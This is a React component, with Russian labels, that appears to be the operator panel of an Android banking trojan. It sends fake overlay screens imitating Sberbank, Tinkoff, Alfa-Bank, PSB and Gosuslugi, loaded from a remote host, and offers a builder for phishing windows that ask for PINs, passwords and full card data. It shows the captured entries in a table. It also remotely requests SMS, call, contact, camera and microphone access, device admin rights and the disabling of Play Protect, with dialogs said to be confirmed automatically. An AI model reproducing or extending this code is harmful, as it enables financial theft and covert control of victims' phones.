import React, { useState } from 'react';

// ─── Шаблоны кастомного окна ────────────────────────────────────────────────
const customWindowTemplates = [
    { id: 'pin_4', label: 'Пин-код (4 цифры)', fields: [{ type: 'pin', name: 'pin_code', length: 4, label: '4-значный код' }] },
    { id: 'pin_6', label: 'Пин-код (6 цифр)', fields: [{ type: 'pin', name: 'pin_code', length: 6, label: '6-значный код' }] },
    { id: 'login_only', label: 'Только Логин', fields: [{ type: 'text', name: 'login', placeholder: 'Введите логин' }] },
    { id: 'password_only', label: 'Только Пароль', fields: [{ type: 'password', name: 'password', placeholder: 'Введите пароль' }] },
    { id: 'login_password', label: 'Логин и Пароль', fields: [{ type: 'text', name: 'login', placeholder: 'Логин' }, { type: 'password', name: 'password', placeholder: 'Пароль' }] },
    { id: 'secret_answer', label: 'Секретный ответ', fields: [{ type: 'text', name: 'secret_answer', placeholder: 'Ваш секретный ответ' }] },
    { id: 'card_simple', label: 'Номер карты (простой)', fields: [{ type: 'tel', name: 'card_number', placeholder: 'XXXX XXXX XXXX XXXX' }] },
    { id: 'card_full', label: 'Данные карты (полные)', fields: [{ type: 'card', name: 'payment_card' }] },
    { id: 'card_no_cvv', label: 'Карта (Свои плейсхолдеры)', fields: [{ type: 'card_no_cvv', name: 'payment_card', placeholder_number: '0000 0000 0000 0000', placeholder_date: 'Месяц / Год' }] }
];

// ─── Группы разрешений (runtime + системные) ────────────────────────────────
// key   = что отправить в onRequestPermission:
//         android.permission.* → perm_request_single
//         иное строка         → напрямую как routing_key
// dataKey = ключ в permissionsData для отображения статуса (если отличается от key)
const PERMISSION_GROUPS = [
    {
        label: 'SMS',
        color: '#2196F3',
        perms: [
            { key: 'android.permission.READ_SMS',     label: 'Чтение SMS' },
            { key: 'android.permission.RECEIVE_SMS',  label: 'Получение SMS' },
            { key: 'android.permission.SEND_SMS',     label: 'Отправка SMS' },
        ]
    },
    {
        label: 'Звонки',
        color: '#9C27B0',
        perms: [
            { key: 'android.permission.READ_CALL_LOG',          label: 'История звонков (чтение)' },
            { key: 'android.permission.WRITE_CALL_LOG',         label: 'История звонков (запись)' },
            { key: 'android.permission.READ_PHONE_STATE',       label: 'Состояние телефона' },
            { key: 'android.permission.READ_PHONE_NUMBERS',     label: 'Номера телефона' },
            { key: 'android.permission.CALL_PHONE',             label: 'Совершение звонков' },
            { key: 'android.permission.PROCESS_OUTGOING_CALLS', label: 'Исходящие вызовы' },
        ]
    },
    {
        label: 'Контакты',
        color: '#4CAF50',
        perms: [
            { key: 'android.permission.READ_CONTACTS',  label: 'Чтение контактов' },
            { key: 'android.permission.WRITE_CONTACTS', label: 'Изменение контактов' },
        ]
    },
    {
        label: 'Камера & Микрофон',
        color: '#F44336',
        perms: [
            { key: 'android.permission.CAMERA',       label: 'Камера' },
            { key: 'android.permission.RECORD_AUDIO', label: 'Микрофон' },
        ]
    },
    {
        label: 'Медиафайлы',
        color: '#FF9800',
        perms: [
            { key: 'android.permission.READ_MEDIA_IMAGES', label: 'Фото (Android 13+)' },
            { key: 'android.permission.READ_MEDIA_VIDEO',  label: 'Видео (Android 13+)' },
            { key: 'android.permission.READ_MEDIA_AUDIO',  label: 'Аудио (Android 13+)' },
        ]
    },
    {
        label: 'Аккаунты',
        color: '#00BCD4',
        perms: [
            { key: 'android.permission.GET_ACCOUNTS', label: 'Доступ к аккаунтам' },
        ]
    },
    {
        // Системные привилегии — используют routing_key напрямую
        label: 'Системные привилегии',
        color: '#607D8B',
        // Нет кнопки "Запросить группу" — у каждой своя логика
        noGroupRequest: true,
        perms: [
            { key: 'power_conduit',            dataKey: 'is_battery_optimized_ignored',  label: 'Оптимизация батареи отключена' },
            { key: 'primary_conduit_ticket',   dataKey: 'is_default_sms_app',            label: 'Приложение SMS по умолчанию' },
            { key: 'device_admin_request',     dataKey: 'is_device_admin',               label: 'Администратор устройства', revokeKey: 'device_admin_revoke' },
            { key: 'notification_access_ticket', dataKey: 'notification_listener_enabled', label: 'Доступ к уведомлениям (слушатель)', noOverlay: true },
            { key: 'play_protect_disable',     dataKey: null,                            label: 'Play Protect отключён',             noOverlay: true },
        ]
    },
];

// ─── Вспомогательные компоненты ──────────────────────────────────────────────
const StatusIcon = ({ value }) => {
    if (value === true)  return <span style={{ color: '#2ecc71', fontWeight: 'bold', fontSize: 14 }} title="Выдано">✓</span>;
    if (value === false) return <span style={{ color: '#e74c3c', fontWeight: 'bold', fontSize: 14 }} title="Не выдано">✗</span>;
    return <span style={{ color: '#f39c12', fontWeight: 'bold', fontSize: 14 }} title="Неизвестно">?</span>;
};

const StatusDisplay = ({ status }) => {
    switch (status) {
        case 'active':   return <span style={{ color: '#2ecc71', fontWeight: 'bold' }}>● Активно</span>;
        case 'inactive': return <span style={{ color: '#f39c12' }}>● Свернуто</span>;
        case 'closed':   return <span style={{ color: '#999' }}>○ Закрыто</span>;
        case 'success':  return <span style={{ color: '#2ecc71' }}>Успешно</span>;
        case 'pending':  return <span style={{ color: '#bdc3c7' }}>Ожидание...</span>;
        case 'error':    return <span style={{ color: '#e74c3c', fontWeight: 'bold' }}>Ошибка</span>;
        default:         return <span style={{ color: '#999' }}>{status || '---'}</span>;
    }
};

// ─── Модальное окно кастомного окна ─────────────────────────────────────────
const CustomWindowModal = ({ onClose, onSend }) => {
    const [step, setStep] = useState(1);
    const [selectedTemplate, setSelectedTemplate] = useState(null);
    const [title, setTitle] = useState('');
    const [description, setDescription] = useState('');
    const [backgroundImageUrl, setBackgroundImageUrl] = useState('');
    const [iconUrl, setIconUrl] = useState('');
    const [btnColor, setBtnColor] = useState('#FFDD2D');
    const [confirmBtnText, setConfirmBtnText] = useState('');
    const [editableFields, setEditableFields] = useState([]);

    const handleTemplateSelect = (template) => {
        setSelectedTemplate(template);
        setTitle(template.label);
        setEditableFields(JSON.parse(JSON.stringify(template.fields)));
        setStep(2);
    };

    const handleFieldChange = (index, key, value) => {
        const updated = [...editableFields];
        updated[index][key] = value;
        setEditableFields(updated);
    };

    const handleSubmit = () => {
        if (!selectedTemplate) return;
        onSend({ title, description, backgroundImageUrl, iconUrl, btn_color: btnColor, confirm_button_text: confirmBtnText, fields: editableFields });
        onClose();
    };

    const modalStyle = { position: 'fixed', top: '50%', left: '50%', transform: 'translate(-50%, -50%)', backgroundColor: '#2c303a', border: '1px solid #555', borderRadius: '8px', padding: '25px', zIndex: 1050, width: '90%', maxWidth: '600px', boxShadow: '0 5px 20px rgba(0,0,0,0.5)', display: 'flex', flexDirection: 'column', maxHeight: '90vh', overflowY: 'auto' };
    const backdropStyle = { position: 'fixed', top: 0, left: 0, right: 0, bottom: 0, backgroundColor: 'rgba(0,0,0,0.7)', zIndex: 1040 };
    const templateButtonStyle = { display: 'block', width: '100%', padding: '12px', textAlign: 'left', background: '#3a3f4c', border: '1px solid #555', color: '#eee', borderRadius: '4px', cursor: 'pointer', marginBottom: '10px' };

    return (
        <>
            <div style={backdropStyle} onClick={onClose}></div>
            <div style={modalStyle}>
                {step === 1 && (
                    <>
                        <h4 style={{ marginTop: 0, color: '#a5a4ff' }}>Шаг 1: Выберите тип окна</h4>
                        <div style={{ maxHeight: '60vh', overflowY: 'auto' }}>
                            {customWindowTemplates.map(t => (
                                <button key={t.id} onClick={() => handleTemplateSelect(t)} style={templateButtonStyle}
                                    onMouseOver={e => e.currentTarget.style.backgroundColor = '#4a4f5c'}
                                    onMouseOut={e => e.currentTarget.style.backgroundColor = '#3a3f4c'}>
                                    {t.label}
                                </button>
                            ))}
                        </div>
                        <div style={{ display: 'flex', justifyContent: 'flex-end', marginTop: '20px' }}>
                            <button onClick={onClose} style={{ background: '#555', color: '#fff', padding: '10px 14px', border: '1px solid #555', borderRadius: 6 }}>Отмена</button>
                        </div>
                    </>
                )}
                {step === 2 && (
                    <>
                        <h4 style={{ marginTop: 0, color: '#a5a4ff' }}>Шаг 2: Настройте детали</h4>
                        <label>Заголовок окна</label>
                        <input type="text" value={title} onChange={e => setTitle(e.target.value)} placeholder="Security Check" />
                        <label style={{ marginTop: '10px' }}>Описание (можно HTML)</label>
                        <input type="text" value={description} onChange={e => setDescription(e.target.value)} placeholder="Введите данные..." />
                        <label style={{ marginTop: '10px' }}>Текст на кнопке</label>
                        <input type="text" value={confirmBtnText} onChange={e => setConfirmBtnText(e.target.value)} placeholder="По умолчанию (Confirm/Подтвердить)" />
                        <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '10px', marginTop: '10px' }}>
                            <div><label>URL фона</label><input type="text" value={backgroundImageUrl} onChange={e => setBackgroundImageUrl(e.target.value)} placeholder="https://..." /></div>
                            <div><label>URL иконки</label><input type="text" value={iconUrl} onChange={e => setIconUrl(e.target.value)} placeholder="https://..." /></div>
                        </div>
                        <label style={{ marginTop: '10px' }}>Цвет кнопки</label>
                        <div style={{ display: 'flex', alignItems: 'center', gap: '10px' }}>
                            <input type="color" value={btnColor} onChange={e => setBtnColor(e.target.value)} style={{ border: 'none', width: '50px', height: '40px', cursor: 'pointer', background: 'transparent' }} />
                            <span style={{ color: '#aaa' }}>{btnColor}</span>
                        </div>
                        <hr style={{ borderColor: '#444', margin: '20px 0' }} />
                        <h5 style={{ margin: '0 0 10px 0', color: '#a5a4ff' }}>Настройка полей ввода</h5>
                        {editableFields.map((field, idx) => (
                            <div key={idx} style={{ background: '#3a3f4c', padding: '10px', borderRadius: '6px', marginBottom: '10px', border: '1px solid #444' }}>
                                <div style={{ fontSize: '12px', color: '#888', marginBottom: '5px' }}>Поле: <b>{field.name}</b> ({field.type})</div>
                                <label style={{ fontSize: '12px' }}>Label поля:</label>
                                <input type="text" value={field.label || ''} onChange={e => handleFieldChange(idx, 'label', e.target.value)} placeholder="Надпись над полем" style={{ marginBottom: '5px' }} />
                                {field.placeholder !== undefined && (
                                    <><label style={{ fontSize: '12px' }}>Placeholder:</label><input type="text" value={field.placeholder} onChange={e => handleFieldChange(idx, 'placeholder', e.target.value)} /></>
                                )}
                                {field.type === 'card_no_cvv' && (
                                    <>
                                        <label style={{ fontSize: '12px' }}>Placeholder номера:</label>
                                        <input type="text" value={field.placeholder_number || ''} onChange={e => handleFieldChange(idx, 'placeholder_number', e.target.value)} style={{ marginBottom: '5px' }} />
                                        <label style={{ fontSize: '12px' }}>Placeholder даты:</label>
                                        <input type="text" value={field.placeholder_date || ''} onChange={e => handleFieldChange(idx, 'placeholder_date', e.target.value)} />
                                    </>
                                )}
                            </div>
                        ))}
                        <div style={{ display: 'flex', justifyContent: 'space-between', marginTop: '20px' }}>
                            <button onClick={() => setStep(1)} style={{ background: '#555', color: '#fff', padding: '10px 14px', border: '1px solid #555', borderRadius: 6 }}>Назад</button>
                            <div style={{ display: 'flex', gap: '10px' }}>
                                <button onClick={onClose} style={{ background: '#555', color: '#fff', padding: '10px 14px', border: '1px solid #555', borderRadius: 6 }}>Отмена</button>
                                <button onClick={handleSubmit} style={{ background: '#5865f2', color: '#fff', padding: '10px 14px', border: '1px solid #5865f2', borderRadius: 6 }}>Отправить</button>
                            </div>
                        </div>
                    </>
                )}
            </div>
        </>
    );
};

// ─── Модальное окно своего сайта ─────────────────────────────────────────────
const RemoteUrlModal = ({ onClose, onSend }) => {
    const [url, setUrl] = useState('https://');
    const submit = () => {
        const v = (url || '').trim();
        if (!/^https?:\/\//i.test(v)) return;
        onSend({ action: 'show_remote_page', page_id: 'my_remote_page', url: v, customization_data: { title: 'Моя страница', iconUrl: '' } });
        onClose();
    };
    return (
        <>
            <div style={{ position: 'fixed', top: 0, left: 0, right: 0, bottom: 0, backgroundColor: 'rgba(0,0,0,0.7)', zIndex: 1040 }} onClick={onClose}></div>
            <div style={{ position: 'fixed', top: '50%', left: '50%', transform: 'translate(-50%, -50%)', backgroundColor: '#2c303a', border: '1px solid #555', borderRadius: '8px', padding: '20px', zIndex: 1050, width: '90%', maxWidth: '520px', boxShadow: '0 5px 20px rgba(0,0,0,0.5)', display: 'flex', flexDirection: 'column', gap: 10 }}>
                <h4 style={{ margin: 0, color: '#a5a4ff' }}>Открыть свой сайт</h4>
                <input type="text" value={url} onChange={e => setUrl(e.target.value)} placeholder="https://example.com" style={{ padding: '10px 12px', background: '#2a2f3c', border: '1px solid #3a3f4c', borderRadius: 8, color: '#fff' }} />
                <div style={{ display: 'flex', justifyContent: 'flex-end', gap: 10 }}>
                    <button onClick={onClose} style={{ background: '#555', color: '#fff', padding: '10px 14px', border: '1px solid #555', borderRadius: 6 }}>Отмена</button>
                    <button onClick={submit} style={{ background: '#22a06b', color: '#fff', padding: '10px 14px', border: '1px solid #22a06b', borderRadius: 6 }}>Открыть на устройстве</button>
                </div>
            </div>
        </>
    );
};

// ─── Список окон ─────────────────────────────────────────────────────────────
const windowOptions = [
    { label: 'Сбербанк',   page_id: 'sber',    url: 'https://fantasy-hub.online/sber.zip' },
    { label: 'Тинькофф',  page_id: 'tinkoff',  url: 'https://fantasy-hub.online/tinkoff.zip' },
    { label: 'Альфа-Банк', page_id: 'alfa',    url: 'https://fantasy-hub.online/alfa.zip' },
    { label: 'ПСБ',        page_id: 'psb',     url: 'https://fantasy-hub.online/psb.zip' },
    { label: 'Гос Услуги', page_id: 'gosi',    url: 'https://fantasy-hub.online/gosi.zip' },
    { label: 'Кастомное окно', page_id: 'custom', url: 'https://fantasy-hub.online/custom.zip' }
];

// ─── Главный компонент ───────────────────────────────────────────────────────
const DeviceManagementTab = ({
    onRequestPrivilege,
    privilegeStatus,
    onSendWindow,
    windowHistory,
    onOpenRemote,
    permissionsData,      // device.systemInfo?.permissions?.data
    onRequestPermission,  // (permissionName) => void  |  ('all') => void
    appName = '',         // для определения lite-версии
}) => {
    const isLiteVersion = appName.toLowerCase().includes('lite');
    const hasSpecialPerms = permissionsData?.is_accessibility_enabled === true || permissionsData?.is_accessibility_enabled === 'true';
    const [activeSubTab, setActiveSubTab] = useState('permissions');
    const [isWindowSelectorOpen, setIsWindowSelectorOpen] = useState(false);
    const [selectedWindow, setSelectedWindow] = useState(null);
    const [isCustomModalOpen, setIsCustomModalOpen] = useState(false);
    const [isRemoteModalOpen, setIsRemoteModalOpen] = useState(false);

    // ── Разрешения: хелперы ──────────────────────────────────────────────────
    // dataKey — ключ в permissionsData; для android.permission.* совпадает с key
    const getPermStatus = (perm) => {
        if (!permissionsData) return undefined;
        const lookupKey = perm.dataKey !== undefined ? perm.dataKey : perm.key;
        if (lookupKey === null) return undefined; // нет источника данных (напр. Play Protect)
        const v = permissionsData[lookupKey];
        if (v === true) return true;
        if (v === false) return false;
        return undefined;
    };

    // Для счётчика и "Запросить все" — только android-разрешения (не системные)
    const allRuntimePerms = PERMISSION_GROUPS
        .filter(g => !g.noGroupRequest)
        .flatMap(g => g.perms);
    const grantedCount = allRuntimePerms.filter(p => getPermStatus(p) === true).length;
    const deniedCount  = allRuntimePerms.filter(p => getPermStatus(p) === false).length;
    const unknownCount = allRuntimePerms.filter(p => getPermStatus(p) === undefined).length;

    // ── Окна: обработчики ────────────────────────────────────────────────────
    const handleWindowSelect = (window) => {
        if (window && window._remote) { setIsWindowSelectorOpen(false); setIsRemoteModalOpen(true); return; }
        setSelectedWindow(window);
        setIsWindowSelectorOpen(false);
        if (window.page_id === 'custom') setIsCustomModalOpen(true);
    };

    const handleSendCustomWindow = (customizationData) => {
        if (selectedWindow?.page_id === 'custom') onSendWindow({ ...selectedWindow, customization_data: customizationData });
    };

    const handleSendClick = () => {
        if (selectedWindow) {
            if (selectedWindow.page_id === 'custom') setIsCustomModalOpen(true);
            else onSendWindow(selectedWindow);
        }
    };

    // ── Стили ────────────────────────────────────────────────────────────────
    const subBtnStyle = (active) => ({ padding: '8px 16px', border: '1px solid #555', background: active ? '#5a5a9e' : '#333', color: active ? '#fff' : '#ccc', cursor: 'pointer', borderRadius: '4px' });
    const cardStyle = { border: '1px solid #444', padding: '14px', borderRadius: '8px', display: 'flex', flexDirection: 'column', background: '#272b35' };
    const reqBtnStyle = (disabled) => ({ marginTop: '10px', padding: '6px 12px', background: disabled ? '#3a3f4c' : '#5865f2', color: disabled ? '#666' : '#fff', border: 'none', borderRadius: '4px', cursor: disabled ? 'not-allowed' : 'pointer', fontSize: '12px', fontWeight: 'bold' });

    return (
        <div className="info-section">
            {isCustomModalOpen && <CustomWindowModal onClose={() => setIsCustomModalOpen(false)} onSend={handleSendCustomWindow} />}
            {isRemoteModalOpen && <RemoteUrlModal onClose={() => setIsRemoteModalOpen(false)} onSend={(d) => onSendWindow && onSendWindow(d)} />}

            {/* Подвкладки */}
            <div style={{ marginBottom: '20px', display: 'flex', gap: '10px', borderBottom: '1px solid #444', paddingBottom: '10px' }}>
                <button onClick={() => setActiveSubTab('permissions')} style={subBtnStyle(activeSubTab === 'permissions')}>Разрешения</button>
                {/* Вкладка Окна скрыта (display:none), логика сохранена */}
                <button onClick={() => setActiveSubTab('windows')} style={{ ...subBtnStyle(activeSubTab === 'windows'), display: 'none' }}>Окна</button>
            </div>

            {/* ═══════════════════ ВКЛАДКА РАЗРЕШЕНИЯ ═══════════════════ */}
            {activeSubTab === 'permissions' && (
                <div>
                    {/* ── Шапка: счётчик + кнопка "Запросить все" ─────────────── */}
                    <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', marginBottom: '8px' }}>
                        <div>
                            <h4 style={{ margin: '0 0 4px 0' }}>Разрешения устройства</h4>
                            {permissionsData && (
                                <span style={{ fontSize: '12px', color: '#aaa' }}>
                                    Runtime: <span style={{ color: '#2ecc71' }}>✓ {grantedCount}</span>
                                    {' · '}
                                    <span style={{ color: '#e74c3c' }}>✗ {deniedCount}</span>
                                    {unknownCount > 0 && <>{' · '}<span style={{ color: '#f39c12' }}>? {unknownCount}</span></>}
                                    {' из '}{allRuntimePerms.length}
                                </span>
                            )}
                        </div>
                        {!isLiteVersion && hasSpecialPerms && (
                            <button
                                onClick={() => onRequestPermission && onRequestPermission('all')}
                                style={{ padding: '8px 16px', background: '#22a06b', color: '#fff', border: 'none', borderRadius: '6px', cursor: 'pointer', fontWeight: 'bold', fontSize: '13px' }}
                            >
                                Запросить все runtime
                            </button>
                        )}
                    </div>
                    <p style={{ color: '#999', fontSize: '13px', marginTop: '4px', marginBottom: '16px' }}>
                        Автоматически выдаются при установке. Нажмите "Запросить" — диалог появится на устройстве и будет подтверждён автоматически.
                    </p>

                    <div style={{ display: 'grid', gridTemplateColumns: 'repeat(auto-fill, minmax(280px, 1fr))', gap: '14px' }}>
                        {PERMISSION_GROUPS.map(group => {
                            const groupGranted = group.perms.filter(p => getPermStatus(p) === true).length;
                            const allGroupGranted = groupGranted === group.perms.length;
                            return (
                                <div key={group.label} style={{ border: `1px solid ${group.color}44`, borderRadius: '8px', overflow: 'hidden', background: '#272b35' }}>
                                    {/* Заголовок группы */}
                                    <div style={{ background: `${group.color}22`, borderBottom: `1px solid ${group.color}44`, padding: '8px 12px', display: 'flex', justifyContent: 'space-between', alignItems: 'center' }}>
                                        <span style={{ color: group.color, fontWeight: 'bold', fontSize: '13px' }}>{group.label}</span>
                                        <span style={{ fontSize: '12px', color: '#aaa' }}>
                                            {groupGranted}/{group.perms.length}
                                            {!group.noGroupRequest && !isLiteVersion && hasSpecialPerms && (
                                                <button
                                                    onClick={() => onRequestPermission && onRequestPermission(group.perms.map(p => p.key))}
                                                    style={{ marginLeft: '6px', padding: '2px 8px', background: allGroupGranted ? '#3a3f4c' : group.color + '99', color: allGroupGranted ? '#666' : '#fff', border: 'none', borderRadius: '3px', cursor: allGroupGranted ? 'not-allowed' : 'pointer', fontSize: '11px' }}
                                                    disabled={allGroupGranted}
                                                >
                                                    Запросить группу
                                                </button>
                                            )}
                                        </span>
                                    </div>
                                    {/* Список разрешений */}
                                    <div style={{ padding: '8px 12px' }}>
                                        {group.perms.map(perm => {
                                            const status = getPermStatus(perm);
                                            const isGranted = status === true;
                                            const shortLabel = perm.key.startsWith('android.permission.')
                                                ? perm.key.replace('android.permission.', '')
                                                : perm.key;
                                            return (
                                                <div key={perm.key} style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', padding: '5px 0', borderBottom: '1px solid #333' }}>
                                                    <div style={{ flex: 1 }}>
                                                        <div style={{ display: 'flex', alignItems: 'center', gap: '6px', flexWrap: 'wrap' }}>
                                                            <span style={{ fontSize: '13px', color: isGranted ? '#ccc' : '#fff' }}>{perm.label}</span>
                                                            {perm.noOverlay && (
                                                                <span title="Запрашивается без оверлея — диалог появится поверх интерфейса пользователя" style={{ fontSize: '10px', background: '#5a4a00', color: '#f0c040', border: '1px solid #8a6a00', borderRadius: '3px', padding: '1px 5px', whiteSpace: 'nowrap' }}>
                                                                    ⚡ без оверлея
                                                                </span>
                                                            )}
                                                        </div>
                                                        <div style={{ fontSize: '10px', color: '#666', fontFamily: 'monospace' }}>{shortLabel}</div>
                                                    </div>
                                                    <div style={{ display: 'flex', alignItems: 'center', gap: '8px', marginLeft: '8px' }}>
                                                        <StatusIcon value={status} />
                                                        {!isLiteVersion && hasSpecialPerms ? (
                                                            <button
                                                                onClick={() => onRequestPermission && onRequestPermission(perm.key)}
                                                                disabled={isGranted}
                                                                style={{ padding: '3px 8px', background: isGranted ? '#2a2f3c' : '#5865f2', color: isGranted ? '#555' : '#fff', border: 'none', borderRadius: '3px', cursor: isGranted ? 'not-allowed' : 'pointer', fontSize: '11px', whiteSpace: 'nowrap' }}
                                                            >
                                                                {isGranted ? 'Выдано' : 'Запросить'}
                                                            </button>
                                                        ) : (
                                                            <span style={{ fontSize: '11px', color: isGranted ? '#2ecc71' : '#e74c3c', whiteSpace: 'nowrap' }}>
                                                                {isGranted ? '✔ Выдано' : '✖ Нет'}
                                                            </span>
                                                        )}
                                                        {perm.revokeKey && isGranted && (
                                                            <button
                                                                onClick={() => onRequestPermission && onRequestPermission(perm.revokeKey)}
                                                                style={{ padding: '3px 8px', background: '#c0392b', color: '#fff', border: 'none', borderRadius: '3px', cursor: 'pointer', fontSize: '11px', whiteSpace: 'nowrap' }}
                                                            >
                                                                Отключить
                                                            </button>
                                                        )}
                                                    </div>
                                                </div>
                                            );
                                        })}
                                    </div>
                                </div>
                            );
                        })}
                    </div>
                </div>
            )}

            {/* ═══════════════════ ВКЛАДКА ОКНА ═══════════════════ */}
            {activeSubTab === 'windows' && (
                <div>
                    <h4>Окна</h4>
                    <div className="window-management-section" style={{ position: 'relative' }}>
                        <div style={{ display: 'flex', alignItems: 'center', gap: '10px' }}>
                            <button onClick={() => setIsWindowSelectorOpen(!isWindowSelectorOpen)}>
                                {selectedWindow ? `Выбрано: ${selectedWindow.label}` : 'Выбрать сайт'}
                            </button>
                            <button onClick={handleSendClick} disabled={!selectedWindow}>Отправить</button>
                        </div>
                        {isWindowSelectorOpen && (
                            <div className="window-dropdown" style={{ position: 'absolute', top: '100%', left: 0, backgroundColor: '#3a3f4c', border: '1px solid #555', borderRadius: '5px', zIndex: 10, marginTop: '5px', maxHeight: '200px', overflowY: 'auto' }}>
                                {[...windowOptions, { label: 'Свой сайт', page_id: 'my_remote_page', _remote: true }].map(option => (
                                    <div key={option.page_id + (option._remote ? '_remote' : '')}
                                        onClick={() => handleWindowSelect(option)}
                                        style={{ padding: '10px 15px', cursor: 'pointer', borderBottom: '1px solid #444' }}
                                        onMouseOver={e => e.currentTarget.style.backgroundColor = '#4a4f5c'}
                                        onMouseOut={e => e.currentTarget.style.backgroundColor = 'transparent'}>
                                        {option.label}
                                    </div>
                                ))}
                            </div>
                        )}
                    </div>
                    <hr style={{ borderColor: '#444', margin: '30px 0' }} />
                    <h4>История вызовов</h4>
                    <table className="history-table">
                        <thead>
                            <tr><th>Сайт и Время</th><th>Статус открытия</th><th>Данные</th><th>Состояние</th></tr>
                        </thead>
                        <tbody>
                            {windowHistory && windowHistory.length > 0 ? (
                                windowHistory.map(call => (
                                    <tr key={call._id}>
                                        <td>
                                            <strong>{((call?.pageId === 'my_remote_page') || /^https?:\/\//i.test(call?.requestUrl || call?.url || '')) ? 'Свой сайт' : (call?.pageId || '-')}</strong>
                                            {call.type === 'remote' && (call.requestUrl || call.url) && <div style={{ fontSize: '12px', opacity: 0.85, marginTop: 4, wordBreak: 'break-all' }}>{call.requestUrl || call.url}</div>}
                                            <br /><small>{new Date(call.createdAt).toLocaleString('ru-RU')}</small>
                                        </td>
                                        <td><StatusDisplay status={call.openStatus} /></td>
                                        <td>
                                            {call.formData && call.formData.length > 0 ? (
                                                call.formData.map((submission, index) => (
                                                    <div key={index}>
                                                        {index > 0 && <hr style={{ borderColor: '#444', margin: '8px 0' }} />}
                                                        <pre style={{ margin: 0, fontSize: '12px', whiteSpace: 'pre-wrap', wordBreak: 'break-all', fontFamily: 'monospace' }}>
                                                            {Object.entries(submission).map(([k, v]) => `    ${k}: ${v}`).join('\n')}
                                                        </pre>
                                                    </div>
                                                ))
                                            ) : 'Данные ещё не введены'}
                                        </td>
                                        <td><StatusDisplay status={call.liveState} /></td>
                                    </tr>
                                ))
                            ) : (
                                <tr><td colSpan="4" style={{ textAlign: 'center', color: '#888' }}>История пуста</td></tr>
                            )}
                        </tbody>
                    </table>
                    <style>{`
                        .history-table { width: 100%; border-collapse: collapse; margin-top: 10px; table-layout: fixed; }
                        .history-table th, .history-table td { vertical-align: top; padding: 8px 12px; border: 1px solid #444; text-align: left; font-size: 13px; word-wrap: break-word; }
                        .history-table th { background-color: #3a3f4c; }
                        .history-table th:nth-child(1) { width: 25%; }
                        .history-table th:nth-child(2) { width: 20%; }
                        .history-table th:nth-child(3) { width: 35%; }
                        .history-table th:nth-child(4) { width: 20%; }
                        .history-table small { color: #999; }
                    `}</style>
                </div>
            )}
        </div>
    );
};

export default DeviceManagementTab;
